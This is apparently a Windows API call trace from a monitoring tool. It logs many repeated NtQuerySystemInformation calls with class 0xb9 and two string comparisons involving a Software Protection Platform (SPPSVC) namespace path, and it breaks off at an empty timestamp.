[0207.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x20, ResultLength=0x0) [0207.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.485] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd300, Length=0x38, ResultLength=0x0) [0207.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd180, Length=0x20, ResultLength=0x0) [0207.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd110, Length=0x20, ResultLength=0x0) [0207.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd110, Length=0x20, ResultLength=0x0) [0207.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.486] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4e0, Length=0x50, ResultLength=0x0) [0207.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4e0, Length=0x50, ResultLength=0x0) [0207.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4e0, Length=0x50, ResultLength=0x0) [0207.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3d0, Length=0x50, ResultLength=0x0) [0207.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3d0, Length=0x50, ResultLength=0x0) [0207.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3d0, Length=0x50, ResultLength=0x0) [0207.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3d0, Length=0x50, ResultLength=0x0) [0207.487] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.488] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd300, Length=0x38, ResultLength=0x0) [0207.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd130, Length=0x28, ResultLength=0x0) [0207.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd130, Length=0x28, ResultLength=0x0) [0207.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.491] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd130, Length=0x28, ResultLength=0x0) [0207.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd1a0, Length=0x28, ResultLength=0x0) [0207.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd300, Length=0x38, ResultLength=0x0) [0207.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.492] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd220, Length=0x28, ResultLength=0x0) [0207.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.494] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd220, Length=0x28, ResultLength=0x0) [0207.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd300, Length=0x38, ResultLength=0x0) [0207.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd180, Length=0x20, ResultLength=0x0) [0207.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x20, ResultLength=0x0) [0207.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x20, ResultLength=0x0) [0207.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd100, Length=0x20, ResultLength=0x0) [0207.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd300, Length=0x38, ResultLength=0x0) [0207.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd180, Length=0x20, ResultLength=0x0) [0207.495] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd110, Length=0x20, ResultLength=0x0) [0207.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd110, Length=0x20, ResultLength=0x0) [0207.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd590, Length=0x50, ResultLength=0x0) [0207.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd510, Length=0x28, ResultLength=0x0) [0207.496] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0207.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd590, Length=0x50, ResultLength=0x0) [0207.496] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd590, Length=0x50, ResultLength=0x0) [0207.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd590, Length=0x50, ResultLength=0x0) [0207.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.497] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c0, Length=0x38, ResultLength=0x0) [0207.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2f0, Length=0x28, ResultLength=0x0) [0207.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.500] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2f0, Length=0x28, ResultLength=0x0) [0207.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2f0, Length=0x28, ResultLength=0x0) [0207.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd360, Length=0x28, ResultLength=0x0) [0207.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.501] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c0, Length=0x38, ResultLength=0x0) [0207.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.502] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e0, Length=0x28, ResultLength=0x0) [0207.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.547] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e0, Length=0x28, ResultLength=0x0) [0207.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c0, Length=0x38, ResultLength=0x0) [0207.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd340, Length=0x20, ResultLength=0x0) [0207.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2c0, Length=0x20, ResultLength=0x0) [0207.548] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2c0, Length=0x20, ResultLength=0x0) [0207.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2c0, Length=0x20, ResultLength=0x0) [0207.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c0, Length=0x38, ResultLength=0x0) [0207.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd340, Length=0x20, ResultLength=0x0) [0207.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x20, ResultLength=0x0) [0207.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x20, ResultLength=0x0) [0207.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.549] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd590, Length=0x50, ResultLength=0x0) [0207.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd510, Length=0x28, ResultLength=0x0) [0207.550] _wcsicmp (_String1="SPPSVC\\55c92734-d682-4d71-983e-d6ec3f16059f\\4de7cb65-cdf1-4de9-8ae8-e3cce27b9f2c", _String2="__##USERSEP##\\$$_RESERVED_$$\\NAMESPACE__") returned 20 [0207.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd590, Length=0x50, ResultLength=0x0) [0207.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd590, Length=0x50, ResultLength=0x0) [0207.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd590, Length=0x50, ResultLength=0x0) [0207.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.550] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c0, Length=0x38, ResultLength=0x0) [0207.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2f0, Length=0x28, ResultLength=0x0) [0207.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2f0, Length=0x28, ResultLength=0x0) [0207.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2f0, Length=0x28, ResultLength=0x0) [0207.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.554] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd360, Length=0x28, ResultLength=0x0) [0207.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c0, Length=0x38, ResultLength=0x0) [0207.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.555] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e0, Length=0x28, ResultLength=0x0) [0207.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd3e0, Length=0x28, ResultLength=0x0) [0207.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c0, Length=0x38, ResultLength=0x0) [0207.557] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd340, Length=0x20, ResultLength=0x0) [0207.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2c0, Length=0x20, ResultLength=0x0) [0207.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2c0, Length=0x20, ResultLength=0x0) [0207.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2c0, Length=0x20, ResultLength=0x0) [0207.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd4c0, Length=0x38, ResultLength=0x0) [0207.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd340, Length=0x20, ResultLength=0x0) [0207.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x20, ResultLength=0x0) [0207.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd2d0, Length=0x20, ResultLength=0x0) [0207.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.558] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.559] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd290, Length=0x50, ResultLength=0x0) [0207.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd290, Length=0x50, ResultLength=0x0) [0207.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd290, Length=0x50, ResultLength=0x0) [0207.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd180, Length=0x50, ResultLength=0x0) [0207.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd180, Length=0x50, ResultLength=0x0) [0207.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd180, Length=0x50, ResultLength=0x0) [0207.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd180, Length=0x50, ResultLength=0x0) [0207.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.713] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x38, ResultLength=0x0) [0207.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcee0, Length=0x28, ResultLength=0x0) [0207.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcee0, Length=0x28, ResultLength=0x0) [0207.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.715] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcee0, Length=0x28, ResultLength=0x0) [0207.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcee0, Length=0x28, ResultLength=0x0) [0207.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcf50, Length=0x28, ResultLength=0x0) [0207.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfd0b0, Length=0x38, ResultLength=0x0) [0207.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0x0, Length=0x0, ResultLength=0x0) [0207.716] NtQuerySystemInformation (SystemInformationClass=0xb9, SystemInformation=0xc751dfcfd0, Length=0x28, ResultLength=0x0) [0207.718] 